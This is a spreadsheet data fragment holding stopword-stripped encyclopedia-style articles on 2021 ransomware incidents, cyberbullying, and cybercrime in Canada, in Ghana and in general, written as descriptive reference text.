carried attacks utilized country's infrastructure organizations involved development covid-19 vaccine. march 2021, attacked ransomware attack, caused company control network. financial corporation largest insurance companies based united states. offers cyber insurance customers. this attack caused organization lose access online services business operations. thus, million dollars regain control network. first, decided ignore hackers trying solve problem independently, could find way, surrendered money group within week. group responsible attack called evil corp. they used type malware called phoenix crytolocker. malware encrypted 15,000 devices network employees working remotely logged company's attack. strongly discourages companies paying ransomware encourages attacks future, data might returned. 2021, colonial pipeline cyberattack disrupted distribution. colonial pipeline pipeline controls almost half (45%) runs east coast united states. this attack caused company turn pipeline, never done before. thus, many people panicked buying gasoline stations, government thought attack would quickly spread. ultimately, colonial pipeline paid nearly amount million dollars worth cryptocurrency. even though colonial paid money, system turn rapidly used hacker accused attack group called darkside. money colonial paid went darkside, entities involved well. now, darkside decided discontinue operations. 2021, exposed cyberattack ransomware delayed plant's meat production. world's largest meat producer provides meat-related products people. this attack caused shutdown nine beef factories united states disrupted poultry </t>
  </si>
  <si>
    <t>Cyberbullying</t>
  </si>
  <si>
    <t xml:space="preserve">cyberbullying cyberharassment form bullying harassment using electronic means. cyberbullying cyberharassment also known online bullying. become increasingly common, especially among teenagers, digital sphere expanded technology advanced. cyberbullying someone, typically teenager, bullies harasses others internet digital spaces, particularly social media sites. harmful bullying behavior include posting rumors, threats, sexual remarks, victims' personal information, pejorative labels (i.e. hate speech). bullying harassment identified repeated behavior intent harm. victims cyberbullying experience lower self-esteem, increased suicidal ideation, various negative emotional responses, including scared, frustrated, angry, depressed.cyberbullying many cases extension already existing traditional bullying. students bullied internet have, cases, also bullied traditional ways (e.g., physically verbally). there students bullied exclusively internet; cyber victims often physically stronger students, causes bullies prefer online confrontations face-to-face contact school.awareness united states risen 2010s, part high-profile cases. several states countries passed laws combat cyberbullying. some designed specifically target teen cyberbullying, others extend scope physical harassment. cases adult cyberharassment, reports usually filed beginning local police. laws differ area state. research demonstrated number serious consequences cyberbullying victimisation. specific statistics negative effects cyberbullying differ country demographics. some researchers point could modern computer techniques determine stopping cyberbullying.other research suggested uptick cyberbullying covid-19 pandemic many youth adults quarantined home and, consequence, online often pandemic. example, study adults published journal social psychology identified statistically significant increases pro-cyberbullying attitudes well cyberbullying offending behavior. however, another study involving 6,500 canadian youth grades 4-12 find higher rates cyberbullying involvement. authors speculated might result closer monitoring involvement online activities parents children home.internet trolling common form bullying takes place online community (such online gaming social media) order elicit reaction disruption, simply someone's personal amusement. cyberstalking another form bullying harassment uses electronic communications stalk victim; pose credible threat victim.not negative interaction online social media attributed cyberbullying. research suggests also interactions online result peer pressure, negative, positive, neutral impact involved. definitions frequently used definition cyberbullying aggressive, intentional behavior carried group individual, using electronic forms contact, repeatedly time victim cannot easily defend herself." there many variations definition, national crime prevention council's specific definition: "the process using internet, cell phones devices send post text images intended hurt embarrass another person."cyberbullying often similar traditional bullying, notable distinctions. victims cyberbullying know identity bully, bully targeting them, based online nature interaction. harassment wide-reaching effects victim, content used harass victim spread shared easily among many people often remains accessible long initial incident.the terms "cyberharassment" "cyberbullying" sometimes used synonymously, though people latter refer specifically harassment among minors school setting. cyberstalking cyberstalking form online harassment perpetrator uses electronic communications stalk victim. this considered dangerous forms cyberbullying generally involves credible threat victim's safety. cyberstalkers send repeated messages intended threaten harass, encourage others same, either explicitly impersonating victim asking others contact them. trolling internet trolls intentionally provoke offend others order elicit reaction. trolls cyberbullies always goals: trolls engage cyberbullying, others engaged comparatively harmless mischief. troll disruptive either amusement genuinely combative person. hate raids twitch livestreaming services, hate raids situations stream "raided" multiple viewers simultaneously flood chat harassing hateful messages, preventing streamer executing stream. these viewers typically automated bots, making difficult moderate block viewers streamer moderators. methods used manuals intended educate public cyberbullying summarize cyberbullying inclusive acts intended cruelty others form posting sending material using internet capable device. research, legislation education field ongoing. research identified basic definitions guidelines help recognize cope regarded abuse electronic communications. cyberbullying involves repeated behavior intent harm. cyberbullying perpetrated harassment, cyberstalking, denigration (sending posting cruel rumors falsehoods damage reputation friendships), impersonation, exclusion (intentionally cruelly excluding someone online group)cyberbullying simple continuing send emails text messages harassing someone said want contact sender. also include public actions repeated threats, sexual remarks, pejorative labels (i.e. hate speech) defamatory false accusations, ganging victim making person subject ridicule online forums, hacking vandalizing sites person, posting false statements fact aimed discrediting humiliating targeted person. cyberbullying could limited posting rumors person internet intention bringing hatred others' minds convincing others dislike participate online denigration target. extent personally identifying victims crime publishing materials defaming humiliating them.cyberbullies disclose victims' personal data (e.g. real name, home address, workplace/schools) websites forums—called doxing, impersonation, creating fake accounts, comments sites posing target purpose publishing material name defames, discredits ridicules them. this leave cyberbully anonymous, make difficult caught punished behavior, although cyberbullies maintain anonymity. users semi-anonymous chat websites high risk cyberbullying, also easy outlet cyberbully remain anonymous. text instant messages emails friends also constitute cyberbullying said hurtful. recent rise smartphones mobile apps yielded accessible form cyberbullying. expected cyberbullying platforms occur often stationary internet platforms constant access internet. addition, combination cameras internet access instant availability modern smartphone technologies yield specific types cyberbullying found platforms. likely cyberbullied mobile devices experience wider range cyberbullying methods exclusively bullied elsewhere.some teens argue events categorized cyberbullying simply drama. danah boyd writes, "teens regularly used word [drama] describe various forms interpersonal conflict ranged insignificant joking around serious jealousy-driven relational aggression. whereas adults might labeled many practices bullying, teens drama." social media cyberbullying take place social media sites facebook, myspace, twitter. 2008, young people ages online. fact, youth spend time media single activity besides sleeping." last decade witnessed surge cyberbullying, categorized bullying occurs electronic communication technologies, e-mail, instant messaging, social media, online gaming, digital messages images sent cellular phone.there many risks attached social media sites, cyberbullying larger risks. million children harassed, threatened subjected forms cyberbullying facebook past year, percent social-media-using teens witnessed online cruelty ignored mean behavior social media, percent done frequently. ninety-five percent social-media-using teens witnessed cruel behavior social networking sites seen others ignoring mean behavior, percent witnessed frequently. terms like "facebook depression" coined specifically regard result extended social media use, cyberbullying playing large part this. cyberbullying become common nowadays technology children access common apps teenagers cyberbully instagram, twitter, snapchat. cyberbullying become harder stop parents teachers unaware happening. 2006 study found teens adolescents cyberbullied school.this linked reason students access online devices cell phones computers. teens awful things another online realize said published online away. home used safe place teens, child still within reach becoming victim cyberbullying.- whether youtube, ask.fm, text message. wherever face, easy come across cyberbullying making almost impossible escape. according 2013 research study, eight teens social media share information past. this includes location, images, contact information. order protect children, important personal information age, birthday, school/church, phone number, etc. kept confidential.two studies 2014 found body-shaming tweets sent women, also accounted misogynistic tweets.cyberbullying also take place websites belonging certain groups effectively request targeting another individual group. example bullying climate scientists activists. gaming reported experienced online harassment research poll, said recent incident occurred online game. study national yat-sen university observed children enjoyed violent video games significantly likely experience perpetrate cyberbullying.another study discusses direct correlation exposure violent video games cyber bullying also took account personal factors "duration playing online games, alcohol consumption last months, parents drunk last months, anger, hostility, adhd, sense belonging" potential contributing factors cyberbullying. gaming common venue experience harassment, whereas women's harassment tended occur social media. most respondents considered gaming culture equally welcoming genders, though thought favored men. sexual harassment gaming generally involves slurs directed towards women, role stereotyping, overaggressive language. keza macdonald writes guardian sexism exists gaming culture, mainstream within u.s. president barack obama made reference harassment women gamers remarks honor women's history month.competitive gaming scenes less welcoming women broader gaming culture. internet-streamed fighting game competition, female gamer forfeited match coach team, aris bakhtanians, stated, "the sexual harassment part culture. remove fighting game community, fighting game community." comments widely condemned gamers, comments support sexual harassment "drowned vocal majority people expressing outrage, disappointment sympathy." incident built momentum action counter sexual harassment gaming.some game developers subjected harassment death threats players upset changes game developer's online policies. harassment also occurs reaction critics jack thompson anita sarkeesian, fans threats medium. various people harassed connection gamergate controversy. harassment related gaming notably different severity tenor compared online harassment motivated subcultures advocacy issues. other developers harassed simply misogyny anti-lgbtq+ stances. notable case death "near", developer higan, console emulator, took life becoming subject ridicule members online kiwi farms board following announcement nonbinary.sabotage among rival crowdfunding campaigns recurring problem projects related gaming.some instances swatting games call duty league legends resulted enforcement swat units called individuals' homes prank. december 2017, wichita, kansas police officers killed andrew finch kansas home reported swatting prank. search engines information cascades happen users start passing along information assume true, cannot know true, based information users doing. this accelerated search engines' ranking technologies tendency return results relevant user's previous interests. this type information spreading hard stop. information cascades social media internet also harmless, contain truthful information.bullies google bombs term applicable search engine) increase prominence favored posts sorted popular searches, done linking posts many pages possible. examples include campaign neologism "santorum" organized lgbt lobby. google bombs manipulate internet's search engines regardless authentic pages are, counteract type manipulation well. enforcement majority states laws explicitly include electronic forms communication within stalking harassment laws. most enforcement agencies cyber-crime units, internet stalking often treated seriousness reports physical stalking. help resources searched state area. schools safety online privacy issues schools increasingly becoming focus state legislative action. there increase cyberbullying enacted legislation 2006 2010. initiatives curriculum requirements also exist (the ofsted esafety guidance) australia (overarching learning outcome 13). 2012, group teenagers design class haven, connecticut developed application help fight bullying, "back bully" (bob). this anonymous resource computer, smart phone ipad, designed someone witnesses victim bullying, immediately report incident. asks questions time, location bullying happening, well provides positive action empowerment regarding incident. reported information goes database, studied administrators. common threads spotted others intervene break bully's pattern. "back bully" considered standard operating procedure schools across connecticut, recent studies carried among high school teachers concluded prevention programs proved ineffective date.teachers also cyberbullied pupils, well parents school staff. protection there laws address online harassment children focus child predators, well laws protect adult cyberstalking victims, victims age. currently, cyberstalking (and related) laws books. while sites specialize laws protect victims under, working halt online abuse help resource containing list current pending cyberstalking-related united states federal state laws. also lists states laws, related laws countries. global cyber database (gcld) aims become comprehensive authoritative source cyber laws countries.several states, including florida, california, missouri passed laws cyberbullying. california prohibits electronic device cause someone fear life. florida, "jeffrey johnson stand students act" prohibits type bullying including cyberbullying. missouri, anyone violently threatens someone social media convicted class misdemeanor, victim seventeen years younger, convicted class felony. children report negative online behaviors occurring second grade. according research, boys initiate negative online activity earlier girls. however, middle school, girls likely engage cyberbullying boys. whether bully male female, purpose childhood bullying intentionally embarrass, harass, intimidate, make threats online. studies psycho-social effects cyberspace begun monitor effects cyberbullying victims. consequences cyberbullying multi-faceted, affect online offline behavior. research adolescents reported changes victims' behavior result cyberbullying could potentially positive. victims "created cognitive pattern bullies, consequently helped recognize aggressive people."however, journal psychosocial research cyberspace abstract reports critical impacts almost respondents, taking form lower self-esteem, loneliness, disillusionment, distrust people. extreme effects included self-harm. children killed committed suicide cyberbullying incidents. some cases digital self-harm reported individual engages cyberbullying themselves, purposefully knowingly exposes cyberbullying. adults cyberstalking extension physical stalking, criminal consequences. target's understanding cyberstalking happening helpful remedy take protective action. among factors motivate stalkers envy, pathological obsession (professional sexual), unemployment failure life, desire intimidate cause others feel inferior. stalker delusional believe "know" target. stalker wants instill fear person justify status, believe away actions online anonymity.the federal cyberstalking designed prosecute people using electronic means repeatedly harass threaten someone online. there resources dedicated helping adult victims deal cyberbullies legally effectively. steps recommended record everything contact police. mexico, olimpia coral melo, promoted creation digital harassment took name, olimpia law. research australia nationwide australian covert bullying prevalence survey (cross al., 2009) assessed cyberbullying experiences among 7,418 students. results indicated rates cyberbullying increased age, 4.9% students year reporting cyberbullying compared 7.9% year nine. cross al., (2009) reported rates bullying harassing others lower, also increased age. only 1.2% year students reported cyberbullying others compared 5.6% year students. china mainland china, cyberbullying receive adequate scholarly attention. study investigating risk factors cyberbullying sampled 1,438 high school students central china. data showed 34.84% participated bullying 56.88% bullied online.a study cyberbullying hong kong chose 7,654 students elementary school high school classified potential aggressors related cyberbullying. students declared barely participated cyber-attacks. common among high school students students) participate social media platforms; admitted changing nickname others, 56.3% humiliation, 54.2% making someone, 54.2% spreading rumors. hong kong federation youth groups interviewed 1,820 teenagers, 17.5% indicated experienced cyberbullying. this included insults, abuse, publishing personal private pictures social media without permission. european union study published 2011, across member states studied, average children (9–16 years old) bullied confessed bully. however, earlier publication hasenbrink (2009), reporting results meta analysis european union countries, authors estimated (via median results) approximately european young people "bullied/harassed/stalked" internet mobile phones. cyberharassment rates young people across member states ranged 52%. finland sourander (2010) conducted population-based cross-sectional study took place finland. authors study took self-reports 2,215 finish adolescents ages cyberbullying cybervictimization previous months. found that, amongst total sample, 4.8% victims only, 7.4% cyberbullies only, 5.4% cyberbully-victims. authors study able conclude cyberbullying, well cybervictimization, associated psychiatric issues, psychosomatic issues well. many adolescents study reported headaches difficulty sleeping. authors believe results indicate greater need ideas prevent cyberbullying occurs. clearly worldwide problem needs taken seriously. ireland health behaviour school-aged children (hbsc) pilot survey carried eight post-primary schools across ireland, including students aged 15–18. boys girls. participation survey voluntary students, consent obtained parents, students school itself. this survey anonymous confidential, took minutes complete. asked questions traditional forms bullying, well cyberbullying, risk behaviors self-reported health life satisfaction. students said never bullied, victims traditional forms bullying, victims cyberbullying, remaining victims traditional forms bullying cyberbullying. boys mostly said victims traditional forms bullying, girls mostly victims traditional forms bullying cyberbullying. students survey said cyberbullied, showing cyberbullying rise.arrow claims 9–16 year olds ireland bullied online offline, compared europe. although online bullying ireland stands according arrow dit, lower european average, stands half reported cyberbullied. traditional forms bullying ireland occur often europe. 2018 study dublin city university (dcu)'s national anti-bullying research resource centre (abc) found almost post-primary teachers victims cyberbullying, knew colleague experienced previous months. bullying pupils, mainly social media, rest perpetrated parents school staff. various effects bullied teachers included increased stress anxiety, "negative impacts working environment, reluctance report issue seek help management". japan according recent research, japan, percent (compared 25-country average percent) youth ages victims online bullying. number shows online bullying serious concern japan. teenagers spend hours week internet likely become targets online bullying, though percent survey participants understood cyberbullying however, know severity issue; percent surveyed students worried targeted victims cyberbullying.since teenagers find congregating socially internet social media, become easy targets cyberbullying. cyberbullying occur email, text, chat rooms, social media websites. some cyberbullies websites blogs post target's images, publicize personal information, gossip target, express hate target, request people agree bully's view, send links target make sure watching activity.much cyberbullying relational aggression, involves alienating victim peers gossip ostracism. this kind attack easily launched texting online activities. 19-year-old japanese student targeted classmates posted photo online, insulted constantly, asked die. because constant harassment, attempt suicide twice. even quit school, attacks stop.cyberbullying cause serious psychological impact victims. they often feel anxious, nervous, tired, depressed. other examples negative psychological trauma include losing confidence result socially isolated schoolmates friends. psychological problems also show form headaches, skin problems, abdominal pain, sleep problems, bed-wetting, crying. also lead victims commit suicide bullying. united states 2000 2000 survey crimes against children research center university hampshire found young people completed survey experienced form harassment, including threats negative rumors, suffered distressing harassment. 2004 2004 i-safe.org survey 1,500 students grades found: children bullied online. four experienced once. threatened online. nearly five experienced once. received mean threatening e-mails messages. admitted someone said hurtful things online. more four said happened once. told parents adult something hurtful happened online. 2005 youth internet safety survey-2, conducted crimes against children research center university hampshire 2005, found young people survey experienced form harassment. survey nationally representative telephone survey 1,500 youth 10–17 years old. one-third reported feeling distressed incident, distress likely younger respondents victims aggressive harassment (including telephoned, sent gifts, visited home harasser). compared youth harassed online, victims likely social problems. hand, youth harass others likely problems rule breaking aggression.hinduja patchin completed study summer 2005 approximately 1,500 internet-using adolescents found one-third youth reported victimized online, respondents admitted cyberbullying others. while instances cyberbullying involved relatively minor behavior (41% disrespected, called names), physically threatened scared safety. notably, fewer victims told adult incident. additional research hinduja patchin 2007 found youth report victims cyberbullying also experience stress strain related offline problem behaviors running away home, cheating test, skipping school, using alcohol marijuana. authors acknowledge studies provide preliminary information nature consequences online bullying, methodological challenges associated online survey. according 2005 survey national children's home charity tesco mobile, youth ages respondents revealed bullied electronic means. almost three-quarters (73%) stated knew bully, stated offender stranger. responders indicated another person taken picture and/or video cellular phone camera, consequently making feel uncomfortable, embarrassed, threatened. many youths comfortable telling authority figure cyberbullying victimization fear access technology taken them; told parent teacher respectively, tell anyone, told friend. 2006 according 2006 harris interactive cyberbullying research report, commissioned national crime prevention council, cyberbullying problem "affects almost half american teens". 2007 studies published 2007 journal adolescent health indicated young people reporting victims electronic aggression range 35%.in 2007, debbie heimowitz, stanford university master's student, created adina's deck, film based stanford-accredited research. worked focus groups weeks three schools learn problem cyberbullying northern california. findings determined students cyberbullied victims cyberbullying. film used classrooms nationwide designed around learning goals pertaining problems students understanding topic. middle school megan meier reportedly using film solution crisis town. 2008 2008, researchers sameer hinduja (florida atlantic university) justin patchin (university wisconsin-eau claire) published book cyberbullying summarized current state cyberbullying research (bullying beyond schoolyard: preventing responding cyberbullying). their research documented cyberbullying instances increasing preceding several years. they also reported findings then-recent study cyberbullying. random sample approximately 2000 middle-school students large school district southern united states, respondents reported cyberbullied previous days reported cyberbullied least lifetime. while rates slightly lower findings previous research, hinduja patchin pointed earlier studies predominantly conducted among older adolescents internet samples; older youth internet frequently likely experience cyberbullying younger children. 2011 according 2011 national crime victimization survey, conducted u.s. department justice, bureau justice statistics, school crime supplement (scs), students 12–18 admitted experienced cyberbullying school year (with coefficient variation 50%). 2013 youth risk behavior survey 2013, center surveillance, epidemiology, laboratory services centers disease control prevention published results survey part youth risk behavior surveillance system (yrbss) june 2014, indicating percentage school children bullied e-mail, chat rooms, instant messaging, websites, texting ("electronically bullied") course 2013. 2014 2014, mehari, farrell, published study focused literature cyberbullying among adolescents. they found researchers generally assumed cyberbullying distinct aggression perpetrated person. mehari suggest media aggression perpetrated best conceptualized classification aggression, rather considering cyberbullying distinct counterpart existing forms aggression. they suggest future research cyberbullying considered within context theoretical empirical knowledge aggression adolescence.mary howlett-brandon's doctoral dissertation analyzed national crime victimization survey: student crime supplement, 2009, focus cyberbullying victimization black white students specific conditions. 2015 wallethub's 2015's best worst states controlling bullying report measured relative levels bullying states. according report, north dakota, illinois, louisiana, rhode island, washington d.c. attempted suicides high school students. five states highest percentage students bullied campus missouri, michigan, idaho, north dakota, montana.cyberbullying social media usually student-to-student, recently, students cyberbullying teachers. high school students colorado created twitter site bullies teachers. this ranges obscenities false accusations inappropriate actions students. gender research conducted determine differences cyberbullying patterns comparing male female ages relatively inconclusive. there factors lean towards males involved cyberbullying behaviors males tending aggressive behaviors females. this proven, speculated based literature reviews research indicating significant data self-reported. comparatively, review articles indicates differences indicators cyberbullying; increasing indicates increasing bullying behaviors. gender differences mixed results, finding indicated younger females older males (13+) tend engage cyber bullying behaviors.cyberbullies mostly least common trait. cyberbullies generally angry discouraged easily usually strong personalities. they connect others belligerently care feelings victims. both males females engage cyberbullying. females involved cyberbullying much males, females sometimes even found involved cyberbullying males are. reason behind respond; usually respond physical retaliation, women "indirect forms gossiping." cyberbullying indirect form, women likely involved.also, women tend less face-to-face confrontations men, since cyberbullying occurs online, allows women greater chance attacked. according 2017 research study online harassment, americans harassed political views. such harassment affects women differently; approximately twice likely women experienced online harassment political views. however, women politicians disproportionately likely sexually harassed online. women lawmakers three times likely male counterparts receive sexually abusive comments, including threats rape, beatings, death, abduction. legislation jurisdictions united states legislation geared penalizing cyberbullying introduced number u.s. states including york, missouri, rhode island maryland. least states passed laws digital harassment. dardenne prairie springfield, missouri, passed city ordinance making online harassment misdemeanor. city charles, missouri passed similar ordinance. missouri among states lawmakers pursuing state legislation, task forces expected cyberbullying laws drafted implemented. june 2008, rep. linda sanchez (d-calif.) rep. kenny hulshof (r-mo.) proposed federal would criminalize acts cyberbullying.lawmakers seeking address cyberbullying legislation currently specific books deals fairly federal cyberstalking might address acts, according parry aftab, prosecuted yet. proposed federal would make illegal electronic means "coerce, intimidate, harass cause substantial emotional distress." august 2008, california state legislature passed first laws country deal directly cyberbullying. assembly bill 2008 gives school administrators authority discipline students bullying, offline online. this took effect january 2009.a york's albany county criminalized cyberbullying struck unconstitutional york court appeals people marquan recent ruling first seen determined possible internet service provider (isp) liable content sites hosts, setting precedent treat notice complaint seriously investigate immediately.18 u.s.c. 875(c) criminalizes making threats internet. while states laws require schools mediate cyberbullying conflicts, several states sued first amendment grounds examining decisions three lawsuits heard lower courts, alvin primack kevin johnson argued current first amendment doctrine, particularly case morse frederick (2007), offer interpretive resources justifying administrative reach online digital speech. they concluded, "[w]ithout clearer standards, school administrators likely feel constrained side inaction." united kingdom early february 2022, ministers parliament planned proposed online safety bill several criminal offences send death threats online deliberately share dangerous disinformation fake covid cures. other offences, revenge porn, posts advertising people-smuggling, messages encouraging people commit suicide, would fall responsibilities online platforms like facebook twitter tackle. philippines cybercrime prevention 2012 defines cyberlibel punishable offence section revised penal code 1930. european union since 1990s, united kingdom european countries working solve workplace bullying since legislation regulating cyberbullying. pervasive nature technology made bullying online much easier. 24-hour internet connection gives bullies neverending opportunity find bully victims. employers european union legal responsibility employees countries. since employers ability fire hire employee like united states, employers europe held high standard employees treated. 2007, european union developed framework agreement harassment violence work, prevents bullying occurring workplace holds employers accountable providing fair working conditions. defines responsibilities employer protecting employees bullies work environment psychological pain victim faces bullies business hours. lawyers pursuing cyberbullying cases ordinance victimization work law, since laws specifically condemning cyberbullying.in 1993, sweden first european union country cyberbullying. ordinance victimization work protected victims "recurrent reprehensible distinctly negative actions directed directed individual employees offensive manner result employees placed outside workplace community".in 2002, france passed social modernization law, added consequences french labor code cyberbullying holding employers accountable involvement harassment. </t>
  </si>
  <si>
    <t>Cybercrime in Canada</t>
  </si>
  <si>
    <t>computer crime, cybercrime canada, evolving international phenomenon. people businesses canada countries affected computer crimes may, originate within borders country. from canadian perspective, 'computer crime' considered defined council europe convention cybercrime (november 2001). canada contributed, signatory, international criminal offences involving computers: offences confidentiality, integrity availability computer data systems; computer-related offences; content-related offences; offences related infringements copyright related rights; ancillary liability.canada also signatory additional protocol convention cybercrime, concerning criminalization acts racist xenophobic nature committed computer systems (january 2003). july 2008 canada ratified convention cybercrime additional protocol convention cybercrime, concerning criminalization acts discriminatory nature committed computer systems. canadian computer crime laws criminal code contains laws dealing computer crime issues. criminal offences contained convention cybercrime (november 2001) canada ratified convention cybercrime criminal code fully address areas criminal convention cybercrime. computer-related offences computer-related forgery computer-related fraud content-related offences offences related child pornography offences related infringements copyright related rights ancillary liability attempt aiding abetting corporate liability criminal offences additional protocol convention cybercrime canada ratified additional protocol convention cybercrime, criminal code fully address following criminal offences: dissemination racist xenophobic material computer systems racist xenophobic motivated threat racist xenophobic motivated insult denial, gross minimization, approval justification genocide crimes humanity aiding abetting laws criminal code section criminal code deals theft, forgery credit cards unauthorized computer section criminal code deals privacy section criminal code deals identity theft section criminal code deals identity fraud canadian computer criminals canadian hacker group 'the brotherhood warez' hacked canadian broadcasting corporation's website april 1997; replacing homepage message "the media liars" references</t>
  </si>
  <si>
    <t>Cybercrime in Ghana</t>
  </si>
  <si>
    <t>ghana highest rates cybercrime world, ranking 2008 internet crime survey. popular form cybercrime ghana cyberfraud typically achieved credit card fraud. however, recent decreases universal credit card usage seen expansion cybercrimes blackmail hacking. this growth crime warranted government response, policies specifically addressing cyberspace developed. this necessitated various studies including cyber security maturity study inaugurated ministry communications conducted global cyber security capacity center (gcscc) university oxford collaboration world bank. history cybercrime ghana traced back "419 schemes" nigeria, also known "advance-fee scams" prior internet. these scams form credit card fraud whereby perpetrator would offer monetary incentive, usually form international money transfer, exchange several payments victim. this form scamming became especially popular crisis 1980s, nigeria's dependent economy made large portion workforce redundant. within demographic large quantity ghanaian workers, migrated employment opportunities sector. subsequently, scammers imported trade upon return ghana, however, remained relatively inconsequential terms scale. proliferation cybercrime ghana really began early 21st century information communications technology (ict) sector became liberalized 5-year accelerated development program, helping expand improve telecommunications infrastructure. this five percentage point increase internet users 2000 2011, home internet subscribers reaching million nationwide. this growth internet usage, along technological devices made available e-waste, significant increase cybercrime relative ease access cyberweb. initially, credit card fraud common cybercrime. however, since 2004, types cyberfraud cybercrimes become popular. common types cybercrime ghana cyberfraud identity fraud this form fraud involves perpetrator assuming fake online activity contact victims social networking dating websites. common form "romance fraud", involves fake profiles generated order attract victims. typically, older women targeted manipulated sending gifts money either romantic purposes promise reciprical gain. these frauds ability relatively sophisticated doctored photos, diplomas identification documents. fake gold dealers this form fraud similar identity fraud insofar assume fake online personas attract primarily westerners. however, fake gold dealers target investors looking short-term monetary gain offering co-ownership lucrative gold mines south ghana. typically, scammers show real gold bars well offer tours mining facilities order gain trust investors, however, upon receipt downpayments victims, close business. estate fraud unlike identity fraud fake gold dealers, estate fraud targets ghanaians rather westerners. quite often, ghanaians migrate abroad employment opportunities, typically higher wages abroad, come back ghana retirement. these fraudsters fake websites offering luxury housing returning, offer construct housing them. scammers sell blueprints, land materials progression victims, ultimate goal maximizing wealth extraction. blackmail ghana home largest collection e-waste dumpsites world. these sites consist electronic items including computers, laptops mobile phones. culprits rummage items search sensitive hardrives, contain information blackmail victims. example attempt ghanaian cybercriminals blackmail u.s. congressmen robert wexler upon finding hardrive e-waste dumpsite. hacking greater availability technology internet services allowed sophistication hacking techniques ghana. like elsewhere world, hackers operate for-profit, mostly creation fake websites aimed tricking victims inputting credit card information. alternatively, ghana also seen creation pro-justice hacking groups "ethical hackers", mostly targeted government websites goal exposing corruption.most cybercrime ghana cyberfraud, perpetrators partake fraudulent activities internet goal financial gain. however, take many forms, different tactics used depending culprit victim. additionally, hacking blackmail type scams become popular recent years. most ghanaians credentials elsewhere perform criminal activities using victims credentials(ssn credit card) personal stuffs online. vasco vester young volta region ghana currently living criminal activities internet pentesting, using victim cards online rent(apartment car) criminal activities. ghana gov't might risk land their....9ghana0 sakawa cybercrime increased ghana, seen development "sakawa", combination internet based crime west african traditionalist religion. those practice sakawa seek blessings priests order improve cyber-scamming yields. exchange, perpetrators must perform specific rituals activities order appease spirits pray. popularity mixture theology cybercrime creation "sakawa boys" subset, often flaunt jewelry clothing part aesthetic. furthermore, sakawa boys also produce media film music, mainstream breakthrough 2007. typically, sakawa boys tend male, live near urban centres slums, unemployed underemployed, making lifestyle available cybercriminality appealing. e-waste e-waste, electronic waste, presented significant security health concerns ghana, country currently boasts largest e-waste dumpsites world. growth e-waste main factors; booming industry within ghana, lack cheap domestic e-waste disposal sites within economically developed countries. this facilitated necessity cheap electronics ghana, many able afford technology. issue grown severity infrastructure ghana able coop increased waste. consequently, e-waste sites significant security health impacts, domestic international level. e-waste has, extent, allowed proliferation cybercrime within ghana, sensitive information properly wiped hard-drives. instance, 2008, environmental agencies found computers belonging national health services local councils, agbogbloshie dumpsite accra. although crime committed using information technology, raised significant security concerns internationally. statistics between 2016 2018, country lost us$200 million recorded cyber crime cases. according ghana police service, half reported cases linked fraud.police also recorded increase cyber crimes country 2016 2017 2018. government response legislation ghanaian government cybercrime increasingly real threat mid-2000s. first major piece legislation response issue, 2008 electronic transactions (act 772), convicted internet fraud, form cybercrime, charged criminal code 20/60 section 131. critics argued lack severity punishment code, well lack relevance facts cases, meant served weak deterrent cybercrime. since however, ghanaian parliament continued pass legislation specific cybercrime, including national information technology agency act, 2008 (act 771) data protection act, 2012 (act 843). despite this, limitations current legislation exist, lack adaptibility forms cybercrime difficulty collecting evidence persecute acts. other policies national cyber security awareness month major interventions government launch cyber security awareness month improve knowledge ghanaian populace cyber security. national cyber security awareness month launched october 2018 sidelines launch national cyber security awareness program. following themes previous years: 2018: safer digital ghana 2019: demonstrating ghana's cyber security readiness cyber security policy strategy ghana adopted cyber security policy strategy increase security citizens state cyber attacks. document divided three sections highlighting common cyber challenges country, existing local global initiatives prevent cyber fraud ways laws cyber crime enforced. also defines role relevant government agencies play ensuring secure cyber space.the policy also reviews classified critical national information infrastructure (cnii) "assets, systems functions" whose destruction ineffectiveness could affect country's national economic strength, national image, national defense security, public health safety government's ability function effectively. references</t>
  </si>
  <si>
    <t>Cybercrime</t>
  </si>
  <si>
    <t>cybercrime crime involves computer network. computer used commission crime, target. cybercrime harm someone's security financial health.there many privacy concerns surrounding cybercrime confidential information intercepted disclosed, lawfully otherwise. internationally, governmental non-state actors engage cybercrimes, including espionage, financial theft, cross-border crimes. cybercrimes crossing international borders involving actions least nation-state sometimes referred cyberwarfare. warren buffett describes cybercrime "number problem mankind" "poses real risks humanity."a report (sponsored mcafee) published 2014 estimated annual damage global economy $445 billion. approximately $1.5 billion lost 2012 online credit debit card fraud 2018, study center strategic international studies (csis), partnership mcafee, concludes nearly percent global gdp, close $600 billion, lost cybercrime year. world economic forum 2020 global risk report confirmed organized cybercrimes bodies joining forces perpetrate criminal activities online estimating likelihood detection prosecution less percent classifications with traditional crime reducing, global communities continue witness sporadic growth cybercrime. computer crime encompasses broad range activities, financial crimes scams, cybersex trafficking frauds financial fraud crimes computer fraud dishonest misrepresentation fact intended another refrain something causes loss. context, fraud result obtaining benefit altering unauthorized way. this requires little technical expertise common form theft employees altering data entry entering false data, entering unauthorized instructions using unauthorized processes; altering, destroying, suppressing, stealing output, usually conceal unauthorized transactions. this difficult detect; altering deleting stored data;other forms fraud facilitated using computer systems, including bank fraud, carding, identity theft, extortion, theft classified information. these types crime often result loss private information monetary information. cyberterrorism government officials information technology security specialists documented significant increase internet problems server scams since early 2001. there growing concern among government agencies federal bureau investigation (fbi) central intelligence agency (cia) intrusions part organized effort cyberterrorist foreign intelligence services, groups potential security holes critical systems. cyberterrorist someone intimidates coerces government organization advance political social objectives launching computer-based attack computers, networks, information stored them. cyberterrorism, general, defined terrorism committed cyberspace computer resources (parker 1983). such, simple propaganda piece internet bomb attacks holidays considered cyberterrorism. there also hacking activities directed towards individuals, families, organized groups within networks, tending cause fear among people, demonstrate power, collecting information relevant ruining peoples' lives, robberies, blackmailing, etc. cyberextortion cyberextortion occurs website, e-mail server, computer system subjected threatened repeated denial service attacks malicious hackers. these hackers demand money return promising stop attacks offer "protection". according federal bureau investigation, cybercrime extortionists increasingly attacking corporate websites networks, crippling ability operate demanding payments restore service. more cases reported month many unreported order keep victim's name public domain. perpetrators typically distributed denial-of-service attack. however, cyberextortion techniques exist doxing extortion poaching. example cyberextortion attack sony pictures 2014.ransomware kind cyberextortion malware used restrict access files, sometimes threatening permanent data erasure unless ransom paid. kapersky 2016 security bulletin report estimates business falls victim ransomware every minutes. predicted attack business every minutes 2021. with ransomware remaining fastest growing cybercrimes world, global ransomware damage predicted cost billion 2021. cybersex trafficking cybersex trafficking transportation victims live streaming coerced sexual acts rape webcam. victims abducted, threatened, deceived transferred 'cybersex dens.' dens location cybersex traffickers computer, tablet, phone internet connection. perpetrators social media networks, videoconferences, dating pages, online chat rooms, apps, dark sites, platforms. they online payment systems 